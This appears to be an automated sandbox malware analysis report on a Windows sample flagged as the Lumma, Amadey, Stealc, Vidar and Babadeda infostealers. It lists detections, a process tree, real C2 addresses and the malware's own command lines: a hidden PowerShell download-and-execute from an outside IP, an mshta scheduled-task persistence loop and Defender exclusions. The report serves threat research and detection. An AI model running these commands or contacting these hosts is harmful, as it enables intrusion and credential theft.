Windows Analysis Report
EdYEXasNiR.exe

Overview

General Information

Sample name: EdYEXasNiR.exe (renamed because original name is a hash value)
Original sample name: 0be97a686bb58f470d1d096a12097fa8.exe
Analysis ID: 1582828
MD5: 0be97a686bb58f470d1d096a12097fa8
SHA1: b35c19eb80c62bfae9ed4561165729bf96d3ea99
SHA256: 02c7411fd491368727387ac793e3bb3fcd9b792f1a18cec7c0da5cd65cbccc72
Tags: exe, user-abuse_ch
Infos:

Detection

LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Yara detected Amadey
Yara detected Amadey's stealer DLL
Yara detected Babadeda
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
Yara detected obfuscated html page
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Creates HTML files with .exe extension (expired dropper behavior)
Creates multiple autostart registry keys
Drops PE files to the document folder of the user
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Hides threads from debuggers
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Monitors registry run keys for changes
PE file contains section with special chars
PE file has nameless sections
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell DownloadFile
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious MSHTA Child Process
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • EdYEXasNiR.exe (PID: 6464 cmdline: "C:\Users\user\Desktop\EdYEXasNiR.exe" MD5: 0BE97A686BB58F470D1D096A12097FA8)
    • DX0TGIT2LZWIIEDZ8Y3A15R.exe (PID: 2656 cmdline: "C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe" MD5: 3F6AB8A7E543EE65455B7D923402EF58)
      • chrome.exe (PID: 7184 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
        • chrome.exe (PID: 7416 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2152,i,11031812561136754540,12085514892588274456,262144 /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • msedge.exe (PID: 3852 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 6464 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2148,i,10048407555887453736,9436864136807657335,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • cmd.exe (PID: 7416 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\HJEHIJEBKE.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • HJEHIJEBKE.exe (PID: 7892 cmdline: "C:\Users\user\Documents\HJEHIJEBKE.exe" MD5: 69E09CBF7B56454D9FF5686CD8FE492F)
        • Conhost.exe (PID: 3404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 456YTTQ213T2RO9QAEYSNNZDL.exe (PID: 3696 cmdline: "C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe" MD5: 69E09CBF7B56454D9FF5686CD8FE492F)
      • skotes.exe (PID: 4780 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 69E09CBF7B56454D9FF5686CD8FE492F)
  • skotes.exe (PID: 4884 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 69E09CBF7B56454D9FF5686CD8FE492F)
  • msedge.exe (PID: 2620 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7212 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2008,i,2217384488025341277,266429373537081613,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • skotes.exe (PID: 7832 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 69E09CBF7B56454D9FF5686CD8FE492F)
    • f3d6f9fcfe.exe (PID: 8064 cmdline: "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" MD5: C821E7D7DAC978E7D5E8F35B0FE2AF88)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7400 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\C0C9.tmp\C0CA.tmp\C0CB.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • cmd.exe (PID: 7364 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • f3d6f9fcfe.exe (PID: 7432 cmdline: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word MD5: C821E7D7DAC978E7D5E8F35B0FE2AF88)
            • cmd.exe (PID: 7456 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\C1B3.tmp\C1B4.tmp\C1B5.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cbfb8a9c89.exe (PID: 7948 cmdline: "C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe" MD5: 9BE5AC720DCF1838FD5A2D7352672F66)
      • conhost.exe (PID: 6100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6180 cmdline: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 4448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4384 cmdline: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 5304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • jyidkjkfhjawd.exe (PID: 7064 cmdline: "C:\wOXcVegx\jyidkjkfhjawd.exe" MD5: 1B40450E11F71DA7D6F3D9C025C078E0)
    • 64252d274d.exe (PID: 7224 cmdline: "C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe" MD5: 9AB250B0DC1D156E2D123D277EB4D132)
      • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 64252d274d.exe (PID: 7584 cmdline: "C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe" MD5: 9AB250B0DC1D156E2D123D277EB4D132)
    • 696689ce6d.exe (PID: 1072 cmdline: "C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe" MD5: 87330F1877C33A5A6203C49075223B16)
    • 0fb12e043c.exe (PID: 7564 cmdline: "C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe" MD5: 26F7294CA7A10C65B44057525A233636)
    • 522bb7a019.exe (PID: 7272 cmdline: "C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe" MD5: 19861D67B2811D6EB3BE1951B28703AE)
  • f3d6f9fcfe.exe (PID: 5404 cmdline: "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" MD5: C821E7D7DAC978E7D5E8F35B0FE2AF88)
    • conhost.exe (PID: 5888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1948 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F7C7.tmp\F7C8.tmp\F7C9.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5884 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • f3d6f9fcfe.exe (PID: 6636 cmdline: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word MD5: C821E7D7DAC978E7D5E8F35B0FE2AF88)
          • cmd.exe (PID: 6732 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F9BB.tmp\F9BC.tmp\F9BD.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • cmd.exe (PID: 1792 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • powershell.exe (PID: 1476 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • cmd.exe (PID: 6876 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • powershell.exe (PID: 4008 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • mshta.exe (PID: 3388 cmdline: mshta "C:\Temp\.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
              • powershell.exe (PID: 6656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
                • conhost.exe (PID: 1076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • 483d2fa8a0d53818306efeb32d3.exe (PID: 7356 cmdline: "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" MD5: 69E09CBF7B56454D9FF5686CD8FE492F)
                  • Conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 6528 cmdline: schtasks /delete /tn "AutoRunHTA" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 1988 cmdline: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • f3d6f9fcfe.exe (PID: 3400 cmdline: "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" MD5: C821E7D7DAC978E7D5E8F35B0FE2AF88)
    • conhost.exe (PID: 2372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3120 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\18EB.tmp\18EC.tmp\18ED.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1180 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • f3d6f9fcfe.exe (PID: 5672 cmdline: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word MD5: C821E7D7DAC978E7D5E8F35B0FE2AF88)
          • cmd.exe (PID: 4612 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\1B0E.tmp\1B0F.tmp\1B10.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • cmd.exe (PID: 4468 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • powershell.exe (PID: 4472 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • cmd.exe (PID: 2700 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • powershell.exe (PID: 3404 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • mshta.exe (PID: 7264 cmdline: mshta "C:\Temp\.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
              • powershell.exe (PID: 7380 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
                • conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • 483d2fa8a0d53818306efeb32d3.exe (PID: 5344 cmdline: "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" MD5: 69E09CBF7B56454D9FF5686CD8FE492F)
            • schtasks.exe (PID: 7452 cmdline: schtasks /delete /tn "AutoRunHTA" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 5692 cmdline: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Babadeda
Description: According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers' analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}
{"C2 url": ["wholersorie.shop", "framekgirus.shop", "cloudewahsj.shop", "tirepublicerj.shop", "noisycuttej.shop", "abruptyopsn.shop", "fancywaxxers.shop", "rabidcowse.shop", "nearycrepso.shop"], "Build id": "PsFKDg--pablo"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Source | Rule | Description | Author | Strings
C:\Temp\.gif | JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |
C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe | JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security |
C:\Temp\5ZycQXqae.txt | JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |
C:\Temp\3GEgnMlRi.txt | JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exe | JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security |

Source | Rule | Description | Author | Strings
0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
0000004B.00000002.2646109112.0000000000C01000.00000040.00000001.01000000.0000001E.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000024.00000003.2395728481.0000000001508000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000002F.00000003.4825063904.00000000009F1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000041.00000003.2682807652.00000000007C4000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Source | Rule | Description | Author | Strings
19.2.f3d6f9fcfe.exe.400000.0.unpack | JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security |
24.2.f3d6f9fcfe.exe.400000.0.unpack | JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security |
19.0.f3d6f9fcfe.exe.400000.0.unpack | JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security |
44.2.f3d6f9fcfe.exe.400000.0.unpack | JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security |
24.0.f3d6f9fcfe.exe.400000.0.unpack | JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security |

Source | Rule | Description | Author | Strings
amsi64_6656.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_7380.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

System Summary

Source: Process started, Author: Jonathan Cheong, oscd.community: Data: Command: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, CommandLine: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F9BB.tmp\F9BC.tmp\F9BD.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6732, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, ProcessId: 1988, ProcessName: schtasks.exe
Source: Registry Key set, Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7832, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f3d6f9fcfe.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3388, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 6656, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx', CommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe, ParentProcessId: 7948, ParentProcessName: cbfb8a9c89.exe, ProcessCommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx', ProcessId: 6180, ProcessName: powershell.exe
